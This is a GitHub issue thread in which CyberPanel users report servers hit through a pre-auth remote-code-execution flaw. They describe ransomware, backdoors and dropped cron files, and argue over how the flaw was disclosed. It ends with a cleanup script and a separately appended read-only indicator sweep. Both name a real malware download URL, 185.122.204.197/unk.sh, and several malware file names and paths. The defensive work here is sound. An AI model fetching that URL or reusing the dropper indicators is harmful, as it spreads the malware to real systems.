
[INFO] Hack my cyberpanel #1346

Open
mikzero opened this issue Oct 29, 2024 · 13 comments

Comments

@mikzero

mikzero commented Oct 29, 2024

Good morning everyone,

This morning, my server with CyberPanel installed was hacked. I couldn't retrieve the logs because the machine was shut down immediately, but while browsing the internet I found this: link. I don't know if you were aware of it. It seems they inserted SSH and then launched a script. The site was accessible from the outside, as it was a test system. If you have already resolved the issue, thank you very much, and feel free to close the issue.

@nursyaf3312

I think it's fixed in the newest update.

@faisalnandak

I also have the same problem. Recently, my VPS server was hit by malware. They encrypted all my files. Luckily, the VPS provider still had a backup.

@Orgoth

Orgoth commented Oct 30, 2024

> I think it's fixed in the newest update.

Yes, but a lot of users now have encrypted servers, and not everyone has a backup.
Some of them have a backup from 2022. "Yes, I know, no backup, no pity."
But CyberPanel is to blame!
Releasing the exploit details to the public without informing the users about the exploit!

It is called:

responsible disclosure

https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce#comment-6580853855

> Hi, the CyberPanel team allowed me to publish the details, although I agree it was a bit too early - they should've taken more care and so should have I. Personally I thought that this doesn't affect many hosts, so I didn't see much of a problem in it :/

52063a8861699170c22b60411c9030ebb57fce8b3fda48c2c613139f41d81dc3

As of today, I never got an email about the exploit!

@nursyaf3312

> > I think it's fixed in the newest update.
>
> Yes, but a lot of users now have encrypted servers, and not everyone has a backup. Some of them have a backup from 2022. "Yes, I know, no backup, no pity." But CyberPanel is to blame! Releasing the exploit details to the public without informing the users about the exploit!
>
> It is called:
>
> responsible disclosure
>
> https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce#comment-6580853855
>
> > Hi, the CyberPanel team allowed me to publish the details, although I agree it was a bit too early - they should've taken more care and so should have I. Personally I thought that this doesn't affect many hosts, so I didn't see much of a problem in it :/
>
> 52063a8861699170c22b60411c9030ebb57fce8b3fda48c2c613139f41d81dc3
>
> As of today, I never got an email about the exploit!

I agree with you; the CyberPanel team never informed the users about the exploit until the PoC was disclosed.

@mikzero

mikzero commented Oct 30, 2024

It seems that the fix has been applied, but upon reviewing the code, I see a copy-paste: link. I find it hard to believe that no one from the team communicated this, or that there was no update alert in the panel. I am disappointed by this behavior. Fortunately, we had a backup, but other agencies will surely struggle with this issue. The update and security alert system needs to be reviewed. I only see this on their site: link.

@Akrobs

Akrobs commented Oct 30, 2024

Same problem, extension of encrypted files: .L0CK3D
No decryptors found... (((

@Akrobs

Akrobs commented Oct 30, 2024

First, my server got this backdoor:
https://sansec.io/research/cosmicsting-cnext-persistent-backdoor

Then, on the server, I found this file (!!!Warning!!!):
udiskssd.zip

That's not all! I found more malware:

usr/bin/perfcc
/root/.config/cron/perfcc
/etc/cron./perfclean
/etc/cron./perfcc

@advwebin

> Same problem, extension of encrypted files: .L0CK3D
> No decryptors found... (((

Were you able to find a solution?

@Akrobs

Akrobs commented Oct 31, 2024

> > Same problem, extension of encrypted files: .L0CK3D
> > No decryptors found... (((
>
> Were you able to find a solution?

It's C3RB3R, Conti v3-based ransomware.

No decryptors (((

@dcasters

> First, my server got this backdoor: https://sansec.io/research/cosmicsting-cnext-persistent-backdoor
>
> Then, on the server, I found this file (!!!Warning!!!): udiskssd.zip
>
> That's not all! I found more malware:
>
> usr/bin/perfcc /root/.config/cron/perfcc /etc/cron./perfclean /etc/cron./perfcc

Same as me, but I have a backup. I just restored it and updated CyberPanel to the latest version.

@Akrobs

Akrobs commented Nov 1, 2024

Check your firewall config.

On AlmaLinux, I found this in the config file:

drifting zone enbled

This string, when enabled, allows traffic to drift between security zones...

This happened after the attack on the server.

@r7avi

r7avi commented Nov 5, 2024

If you can't access SSH, just reboot the system and try again.

Once you are in, run this bash script to remove the virus:

```bash
#!/bin/bash
# Removes the kdevtmpfsi/kingsin miner and its cron dropper. Run as root.
set -u
[ "$(id -u)" -eq 0 ] || { echo "This script must run as root." >&2; exit 1; }

# Define malicious process names, files and download host
MALICIOUS_PROCESSES=("kdevtmpfsi" "kingsin")
MALICIOUS_FILES=("/etc/kingsin" "/tmp/kdevtmpfsi")
MALICIOUS_IP="185.122.204.197"

# 1. Kill malicious processes (SIGKILL so they cannot trap the signal and respawn)
for process in "${MALICIOUS_PROCESSES[@]}"; do
    if pkill -9 -f "$process"; then
        echo "Killed process: $process"
    else
        echo "Process $process not found."
    fi
done

# 2. Remove malicious files (clear the immutable bit first in case it was set)
for file in "${MALICIOUS_FILES[@]}"; do
    if [[ -f "$file" ]]; then
        chattr -i "$file" 2>/dev/null
        rm -f "$file" && echo "Deleted file: $file"
    else
        echo "File not found: $file"
    fi
done

# 3. Remove the malicious crontab entry. Match the download URL as a fixed
#    string (-F), not a regex, so '*', '.' and '|' in the line are taken literally,
#    and keep every other line of the crontab.
CRON_PATTERN="http://$MALICIOUS_IP/unk.sh"
if crontab -l 2>/dev/null | grep -qF "$CRON_PATTERN"; then
    crontab -l | grep -vF "$CRON_PATTERN" | crontab -
    echo "Removed malicious crontab entry."
else
    echo "No malicious crontab entry found."
fi

# 4. Block the malicious IP in both directions: the cron job downloads from it,
#    so outbound must be dropped too. Note: these rules are not persisted across reboots.
iptables -I INPUT -s "$MALICIOUS_IP" -j DROP \
    && iptables -I OUTPUT -d "$MALICIOUS_IP" -j DROP \
    && echo "Blocked IP: $MALICIOUS_IP"

echo "Malware removal completed."
```

@Orgoth

Orgoth commented Nov 5, 2024

An alternative option could be the rescue console, if your provider/hoster supports it.
Then you can mount your hard drives and check the file system and files.
Also, clean up.

Something like this: https://docs.hetzner.com/robot/dedicated-server/troubleshooting/hetzner-rescue-system
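As an added example that is not code from this thread or from the CyberPanel project, the following script ties together two points raised above: the dropped files and cron entries Akrobs listed, and Orgoth's suggestion to mount the disk from a rescue system and inspect it. It takes the root of the filesystem to examine (`/` on a live box, or the mount point such as `/mnt` in a rescue environment) and reports, without deleting anything, every file whose name or contents match the indicators named in the comments (perfcc, perfclean, kdevtmpfsi, kingsin, udiskssd, unk.sh, 185.122.204.197). Each hit is printed with its mtime and SHA-256 so it can be preserved before cleanup. The search locations (`/usr/bin`, `/usr/local/bin`, `/tmp`, `/etc`, `/root`, the `/etc/cron.*` directories, the cron spools and `/root/.config/cron`) are my assumption of where this kind of dropper lands, and the script assumes GNU coreutils (`stat -c`, `sha256sum`):

```bash
#!/bin/bash
# Added example (not from the thread or CyberPanel): read-only sweep of a root
# filesystem for the persistence artifacts named in this issue. Usage:
#   ./sweep.sh /        (live system)
#   ./sweep.sh /mnt     (root volume mounted from a rescue system)
# Nothing is modified; hits are listed with mtime and SHA-256 for preservation.
set -u

# Indicators taken from the comments above. Extend for your own case.
IOC_NAMES="perfcc perfclean kdevtmpfsi kingsin udiskssd"
IOC_STRINGS="185.122.204.197 unk.sh perfcc kdevtmpfsi kingsin"

# Cron locations (relative to the examined root). Assumed locations;
# /etc/cron.* expands to cron.d, cron.hourly, cron.daily, ...
cron_dirs() {
    local root="$1"
    local d
    for d in "$root"/etc/cron.* "$root"/var/spool/cron \
             "$root"/var/spool/cron/crontabs "$root"/root/.config/cron; do
        [ -d "$d" ] && printf '%s\n' "$d"
    done
    return 0
}

# One line per hit: mtime, sha256, path.
report() {
    local f="$1"
    local mtime sum
    mtime=$(stat -c '%y' "$f" 2>/dev/null || stat -f '%Sm' "$f")
    sum=$(sha256sum "$f" 2>/dev/null | cut -d' ' -f1)
    printf '%s  %s  %s\n' "$mtime" "${sum:-?}" "$f"
}

# 1. Files whose basename is a known dropper/binary name, under the usual
#    binary and dropper locations (assumed list).
find_named_iocs() {
    local root="$1"
    local name
    for name in $IOC_NAMES; do
        find "$root"/usr/bin "$root"/usr/local/bin "$root"/tmp "$root"/etc \
             "$root"/root -xdev -name "$name" -type f 2>/dev/null || true
    done | sort -u
}

# 2. Cron files (system dirs and per-user spools) containing a known string,
#    e.g. the download IP or the dropper script name. Fixed-string match (-F).
find_cron_iocs() {
    local root="$1"
    local d s
    set --
    for s in $IOC_STRINGS; do set -- "$@" -e "$s"; done
    cron_dirs "$root" | while read -r d; do
        grep -rlF "$@" "$d" 2>/dev/null || true
    done | sort -u
}

# Combined, deduplicated report for a root path.
sweep() {
    local root="${1%/}"
    local f
    { find_named_iocs "$root"; find_cron_iocs "$root"; } | sort -u | while read -r f; do
        report "$f"
    done
}

# Number of hits, for use in scripts.
sweep_count() {
    sweep "$1" | wc -l | tr -d ' '
}

if [ "${1:-}" ]; then
    sweep "$1"
fi
```

Because the functions take the root as a parameter, the same script works unchanged against a mounted image in a rescue system, where nothing from the compromised host (including a possibly replaced `find` or `grep`) is executed; on a live system, prefer running it before any cleanup so the hashes and timestamps of the dropped files are recorded.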
